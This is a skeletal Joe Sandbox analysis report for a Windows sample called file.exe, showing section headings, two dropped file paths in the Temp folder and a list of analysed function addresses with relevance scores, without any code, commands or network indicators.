Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\IZImiIFXXrvtVOHFozZW.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
file.exe

Function 6C3814B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 00CB116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 00CB15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 00CB81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 00CB8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 00CB13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 00CB11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 00CB1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C454230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 00CB1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 00CB13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C39B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C39B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON